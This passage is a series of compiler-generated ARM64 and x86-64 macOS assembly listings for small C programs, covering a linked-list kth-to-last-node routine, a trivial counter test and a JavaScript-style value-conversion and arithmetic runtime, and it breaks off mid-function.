bl _newNode
str x0, [sp, #40]
str wzr, [sp, #36]
b LBB4_1
LBB4_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #36]
subs w8, w8, #9
cset w8, ge
tbnz w8, #0, LBB4_4
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
ldr x0, [sp, #40]
ldrsw x9, [sp, #36]
sub x8, x29, #44
ldr w1, [x8, x9, lsl #2]
bl _addNode
b LBB4_3
LBB4_3: ; in Loop: Header=BB4_1 Depth=1
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB4_1
LBB4_4:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldr x0, [sp, #40]
bl _printList
mov w8, #3
str w8, [sp, #32]
ldr x0, [sp, #40]
ldr w1, [sp, #32]
bl _findkthToLastNode
str x0, [sp, #24]
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB4_6
b LBB4_5
LBB4_5:
ldr w8, [sp, #32]
; implicit-def: $x10
mov x10, x8
ldr x8, [sp, #24]
ldr w9, [x8]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB4_7
LBB4_6:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
b LBB4_7
LBB4_7:
ldur w8, [x29, #-48]
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB4_9
b LBB4_8
LBB4_8:
bl ___stack_chk_fail
LBB4_9:
ldr w0, [sp, #20] ; 4-byte Folded Reload
ldp x29, x30, [sp, #112] ; 16-byte Folded Reload
add sp, sp, #128
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d "
.section __TEXT,__const
.p2align 2 ; @__const.main.a
l___const.main.a:
.long 1 ; 0x1
.long 2 ; 0x2
.long 3 ; 0x3
.long 4 ; 0x4
.long 5 ; 0x5
.long 6 ; 0x6
.long 7 ; 0x7
.long 8 ; 0x8
.long 9 ; 0x9
.section __TEXT,__cstring,cstring_literals
l_.str.1: ; @.str.1
.asciz "list : "
l_.str.2: ; @.str.2
.asciz "\n%dthNode : %d"
l_.str.3: ; @.str.3
.asciz "\nSEGMENTATION FAULT"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _newNode ## -- Begin function newNode
.p2align 4, 0x90
_newNode: ## @newNode
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $16, %edi
callq _malloc
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
movq $0, 8(%rax)
movq -8(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _addNode ## -- Begin function addNode
.p2align 4, 0x90
_addNode: ## @addNode
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
cmpq $0, 8(%rax)
je LBB1_3
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -8(%rbp)
jmp LBB1_1
LBB1_3:
callq _newNode
movq %rax, -24(%rbp)
movl -12(%rbp), %ecx
movq -24(%rbp), %rax
movl %ecx, (%rax)
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _printList ## -- Begin function printList
.p2align 4, 0x90
_printList: ## @printList
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -8(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -8(%rbp)
je LBB2_3
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rax
movl (%rax), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -8(%rbp)
jmp LBB2_1
LBB2_3:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _findkthToLastNode ## -- Begin function findkthToLastNode
.p2align 4, 0x90
_findkthToLastNode: ## @findkthToLastNode
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movq -16(%rbp), %rax
cmpq $0, 8(%rax)
je LBB3_2
## %bb.1:
cmpl $0, -20(%rbp)
jge LBB3_3
LBB3_2:
movq $0, -8(%rbp)
jmp LBB3_14
LBB3_3:
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
movl $0, -44(%rbp)
LBB3_4: ## =>This Inner Loop Header: Depth=1
movl -44(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB3_10
## %bb.5: ## in Loop: Header=BB3_4 Depth=1
movq -32(%rbp), %rax
cmpq $0, 8(%rax)
je LBB3_7
## %bb.6: ## in Loop: Header=BB3_4 Depth=1
movq -32(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -32(%rbp)
jmp LBB3_8
LBB3_7:
movq $0, -8(%rbp)
jmp LBB3_14
LBB3_8: ## in Loop: Header=BB3_4 Depth=1
jmp LBB3_9
LBB3_9: ## in Loop: Header=BB3_4 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB3_4
LBB3_10:
jmp LBB3_11
LBB3_11: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
cmpq $0, 8(%rax)
je LBB3_13
## %bb.12: ## in Loop: Header=BB3_11 Depth=1
movq -32(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -32(%rbp)
movq -40(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -40(%rbp)
jmp LBB3_11
LBB3_13:
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
LBB3_14:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -52(%rbp)
movl %edi, -56(%rbp)
movq %rsi, -64(%rbp)
leaq -48(%rbp), %rdi
leaq l___const.main.a(%rip), %rsi
movl $36, %edx
callq _memcpy
callq _newNode
movq %rax, -72(%rbp)
movl $0, -76(%rbp)
LBB4_1: ## =>This Inner Loop Header: Depth=1
cmpl $9, -76(%rbp)
jge LBB4_4
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movq -72(%rbp), %rdi
movslq -76(%rbp), %rax
movl -48(%rbp,%rax,4), %esi
callq _addNode
## %bb.3: ## in Loop: Header=BB4_1 Depth=1
movl -76(%rbp), %eax
addl $1, %eax
movl %eax, -76(%rbp)
jmp LBB4_1
LBB4_4:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq -72(%rbp), %rdi
callq _printList
movl $3, -80(%rbp)
movq -72(%rbp), %rdi
movl -80(%rbp), %esi
callq _findkthToLastNode
movq %rax, -88(%rbp)
cmpq $0, -88(%rbp)
je LBB4_6
## %bb.5:
movl -80(%rbp), %esi
movq -88(%rbp), %rax
movl (%rax), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB4_7
LBB4_6:
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
LBB4_7:
movl -52(%rbp), %eax
movl %eax, -92(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB4_9
## %bb.8:
movl -92(%rbp), %eax ## 4-byte Reload
addq $96, %rsp
popq %rbp
retq
LBB4_9:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d "
.section __TEXT,__const
.p2align 4 ## @__const.main.a
l___const.main.a:
.long 1 ## 0x1
.long 2 ## 0x2
.long 3 ## 0x3
.long 4 ## 0x4
.long 5 ## 0x5
.long 6 ## 0x6
.long 7 ## 0x7
.long 8 ## 0x8
.long 9 ## 0x9
.section __TEXT,__cstring,cstring_literals
L_.str.1: ## @.str.1
.asciz "list : "
L_.str.2: ## @.str.2
.asciz "\n%dthNode : %d"
L_.str.3: ## @.str.3
.asciz "\nSEGMENTATION FAULT"
.subsections_via_symbols
| the_stack_data/146119.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str wzr, [sp, #28]
str wzr, [sp, #24]
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
str w8, [sp, #16]
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
str w8, [sp, #8]
ldr w8, [sp, #24]
add w9, w8, #1
str w9, [sp, #24]
str w8, [sp, #8]
str w8, [sp]
ldr w8, [sp]
str w8, [sp, #4]
ldr w8, [sp, #4]
str w8, [sp, #12]
ldr w8, [sp, #12]
str w8, [sp, #20]
ldr w8, [sp, #20]
ldr w9, [sp, #24]
subs w9, w9, #1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
b LBB0_2
LBB0_2:
mov w8, #1
str w8, [sp, #28]
b LBB0_4
LBB0_3:
str wzr, [sp, #28]
b LBB0_4
LBB0_4:
ldr w0, [sp, #28]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $0, -4(%rbp)
movl $0, -8(%rbp)
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
movl %eax, -16(%rbp)
movl -8(%rbp), %eax
addl $1, %eax
movl %eax, -8(%rbp)
movl %eax, -24(%rbp)
movl -8(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -8(%rbp)
movl %eax, -24(%rbp)
movl %eax, -32(%rbp)
movl -32(%rbp), %eax
movl %eax, -28(%rbp)
movl -28(%rbp), %eax
movl %eax, -20(%rbp)
movl -20(%rbp), %eax
movl %eax, -12(%rbp)
movl -12(%rbp), %eax
movl -8(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
je LBB0_3
## %bb.1:
jmp LBB0_2
LBB0_2:
movl $1, -4(%rbp)
jmp LBB0_4
LBB0_3:
movl $0, -4(%rbp)
LBB0_4:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/15761965.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ToBoolean ; -- Begin function ToBoolean
.p2align 2
_ToBoolean: ; @ToBoolean
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp]
str x1, [sp, #8]
ldr w8, [sp]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr q0, [sp]
str q0, [sp, #16]
b LBB0_12
LBB0_2:
ldr w8, [sp]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
mov w8, #1
str w8, [sp, #16]
str xzr, [sp, #24]
b LBB0_11
LBB0_4:
ldr d0, [sp, #8]
fcmp d0, #0.0
cset w8, ne
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5:
mov w8, #1
str w8, [sp, #16]
str xzr, [sp, #24]
b LBB0_10
LBB0_6:
ldr x8, [sp, #8]
lsr x8, x8, #48
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7:
mov w8, #1
str w8, [sp, #16]
str xzr, [sp, #24]
b LBB0_9
LBB0_8:
mov w8, #1
str w8, [sp, #16]
mov x8, #1
str x8, [sp, #24]
b LBB0_9
LBB0_9:
b LBB0_10
LBB0_10:
b LBB0_11
LBB0_11:
b LBB0_12
LBB0_12:
ldr x0, [sp, #16]
ldr x1, [sp, #24]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function ToNumber
lCPI1_0:
.quad 0x7ff8000000000000 ; double NaN
.section __TEXT,__text,regular,pure_instructions
.globl _ToNumber
.p2align 2
_ToNumber: ; @ToNumber
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp]
str x1, [sp, #8]
ldr w8, [sp]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_2
b LBB1_1
LBB1_1:
ldr q0, [sp]
str q0, [sp, #16]
b LBB1_9
LBB1_2:
ldr w8, [sp]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3:
str wzr, [sp, #16]
adrp x8, lCPI1_0@PAGE
ldr d0, [x8, lCPI1_0@PAGEOFF]
str d0, [sp, #24]
b LBB1_8
LBB1_4:
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_6
b LBB1_5
LBB1_5:
str wzr, [sp, #16]
fmov d0, #1.00000000
str d0, [sp, #24]
b LBB1_7
LBB1_6:
str wzr, [sp, #16]
movi d0, #0000000000000000
str d0, [sp, #24]
b LBB1_7
LBB1_7:
b LBB1_8
LBB1_8:
b LBB1_9
LBB1_9:
ldr x0, [sp, #16]
ldr x1, [sp, #24]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _ToNumeric ; -- Begin function ToNumeric
.p2align 2
_ToNumeric: ; @ToNumeric
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp]
str x1, [sp, #8]
ldr x0, [sp]
ldr x1, [sp, #8]
bl _ToNumber
str x0, [sp, #16]
str x1, [sp, #24]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _StrictEqualityComparison ; -- Begin function StrictEqualityComparison
.p2align 2
_StrictEqualityComparison: ; @StrictEqualityComparison
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #16]
str x1, [sp, #24]
str x2, [sp]
str x3, [sp, #8]
ldr w8, [sp, #16]
ldr w9, [sp]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
mov w8, #1
str w8, [sp, #32]
str xzr, [sp, #40]
b LBB3_17
LBB3_2:
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB3_7
b LBB3_3
LBB3_3:
ldr d0, [sp, #24]
ldr d1, [sp, #8]
fcmp d0, d1
cset w8, ne
tbnz w8, #0, LBB3_5
b LBB3_4
LBB3_4:
mov w8, #1
str w8, [sp, #32]
mov x8, #1
str x8, [sp, #40]
b LBB3_6
LBB3_5:
mov w8, #1
str w8, [sp, #32]
str xzr, [sp, #40]
b LBB3_6
LBB3_6:
b LBB3_17
LBB3_7:
ldr w8, [sp, #16]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB3_9
b LBB3_8
LBB3_8:
mov w8, #1
str w8, [sp, #32]
mov x8, #1
str x8, [sp, #40]
b LBB3_17
LBB3_9:
ldr w8, [sp, #16]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB3_17
b LBB3_10
LBB3_10:
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_12
b LBB3_11
LBB3_11:
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_14
b LBB3_12
LBB3_12:
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_15
b LBB3_13
LBB3_13:
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB3_15
b LBB3_14
LBB3_14:
mov w8, #1
str w8, [sp, #32]
mov x8, #1
str x8, [sp, #40]
b LBB3_16
LBB3_15:
mov w8, #1
str w8, [sp, #32]
str xzr, [sp, #40]
b LBB3_16
LBB3_16:
b LBB3_17
LBB3_17:
ldr x0, [sp, #32]
ldr x1, [sp, #40]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _AbstractEqualityComparison ; -- Begin function AbstractEqualityComparison
.p2align 2
_AbstractEqualityComparison: ; @AbstractEqualityComparison
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #32]
str x3, [sp, #40]
ldur w8, [x29, #-32]
ldr w9, [sp, #32]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB4_2
b LBB4_1
LBB4_1:
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
ldr x2, [sp, #32]
ldr x3, [sp, #40]
bl _StrictEqualityComparison
stur x0, [x29, #-16]
stur x1, [x29, #-8]
b LBB4_13
LBB4_2:
ldur w8, [x29, #-32]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB4_7
b LBB4_3
LBB4_3:
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumber
str x0, [sp, #16]
str x1, [sp, #24]
ldr d0, [sp, #24]
ldr d1, [sp, #40]
fcmp d0, d1
cset w8, ne
tbnz w8, #0, LBB4_5
b LBB4_4
LBB4_4:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB4_6
LBB4_5:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB4_6
LBB4_6:
b LBB4_13
LBB4_7:
ldr w8, [sp, #32]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB4_12
b LBB4_8
LBB4_8:
ldr x0, [sp, #32]
ldr x1, [sp, #40]
bl _ToNumber
str x0, [sp]
str x1, [sp, #8]
ldr d0, [sp, #8]
ldur d1, [x29, #-24]
fcmp d0, d1
cset w8, ne
tbnz w8, #0, LBB4_10
b LBB4_9
LBB4_9:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB4_11
LBB4_10:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB4_11
LBB4_11:
b LBB4_13
LBB4_12:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB4_13
LBB4_13:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.globl _AbstractRelationalComparison ; -- Begin function AbstractRelationalComparison
.p2align 2
_AbstractRelationalComparison: ; @AbstractRelationalComparison
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #32]
str x1, [sp, #40]
ldr d0, [sp, #40]
str d0, [sp, #8] ; 8-byte Folded Spill
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
ldr d0, [sp, #8] ; 8-byte Folded Reload
str x0, [sp, #16]
str x1, [sp, #24]
ldr d1, [sp, #24]
fcmp d0, d1
cset w8, pl
tbnz w8, #0, LBB5_2
b LBB5_1
LBB5_1:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB5_3
LBB5_2:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB5_3
LBB5_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsADD ; -- Begin function jsADD
.p2align 2
_jsADD: ; @jsADD
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
stur wzr, [x29, #-16]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #32]
str x1, [sp, #40]
ldr d0, [sp, #40]
str d0, [sp, #8] ; 8-byte Folded Spill
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
ldr d0, [sp, #8] ; 8-byte Folded Reload
str x0, [sp, #16]
str x1, [sp, #24]
ldr d1, [sp, #24]
fadd d0, d0, d1
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsSUB ; -- Begin function jsSUB
.p2align 2
_jsSUB: ; @jsSUB
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
stur wzr, [x29, #-16]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #32]
str x1, [sp, #40]
ldr d0, [sp, #40]
str d0, [sp, #8] ; 8-byte Folded Spill
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
ldr d0, [sp, #8] ; 8-byte Folded Reload
str x0, [sp, #16]
str x1, [sp, #24]
ldr d1, [sp, #24]
fsub d0, d0, d1
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsMUL ; -- Begin function jsMUL
.p2align 2
_jsMUL: ; @jsMUL
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
stur wzr, [x29, #-16]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #32]
str x1, [sp, #40]
ldr d0, [sp, #40]
str d0, [sp, #8] ; 8-byte Folded Spill
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
ldr d0, [sp, #8] ; 8-byte Folded Reload
str x0, [sp, #16]
str x1, [sp, #24]
ldr d1, [sp, #24]
fmul d0, d0, d1
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsDIV ; -- Begin function jsDIV
.p2align 2
_jsDIV: ; @jsDIV
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
stur wzr, [x29, #-16]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #32]
str x1, [sp, #40]
ldr d0, [sp, #40]
str d0, [sp, #8] ; 8-byte Folded Spill
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
ldr d0, [sp, #8] ; 8-byte Folded Reload
str x0, [sp, #16]
str x1, [sp, #24]
ldr d1, [sp, #24]
fdiv d0, d0, d1
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsMOD ; -- Begin function jsMOD
.p2align 2
_jsMOD: ; @jsMOD
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
stp x29, x30, [sp, #96] ; 16-byte Folded Spill
add x29, sp, #96
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #48]
str x3, [sp, #56]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToNumeric
str x0, [sp, #24]
str x1, [sp, #32]
ldr d0, [sp, #32]
str d0, [sp, #40]
ldr x0, [sp, #48]
ldr x1, [sp, #56]
bl _ToNumeric
str x0, [sp]
str x1, [sp, #8]
ldr d0, [sp, #8]
str d0, [sp, #16]
stur wzr, [x29, #-16]
ldr d2, [sp, #40]
ldr d0, [sp, #40]
ldr d1, [sp, #16]
fdiv d0, d0, d1
fcvtzs d0, d0
scvtf d0, d0
ldr d1, [sp, #16]
fmsub d0, d0, d1, d2
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #96] ; 16-byte Folded Reload
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.globl _jsPOS ; -- Begin function jsPOS
.p2align 2
_jsPOS: ; @jsPOS
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp]
str x1, [sp, #8]
ldr x0, [sp]
ldr x1, [sp, #8]
bl _ToNumber
str x0, [sp, #16]
str x1, [sp, #24]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _jsNEG ; -- Begin function jsNEG
.p2align 2
_jsNEG: ; @jsNEG
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
stur wzr, [x29, #-16]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
bl _ToNumeric
str x0, [sp]
str x1, [sp, #8]
ldr d0, [sp, #8]
fneg d0, d0
stur d0, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsAND ; -- Begin function jsAND
.p2align 2
_jsAND: ; @jsAND
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #32]
ldr x1, [sp, #40]
bl _ToBoolean
str x0, [sp]
str x1, [sp, #8]
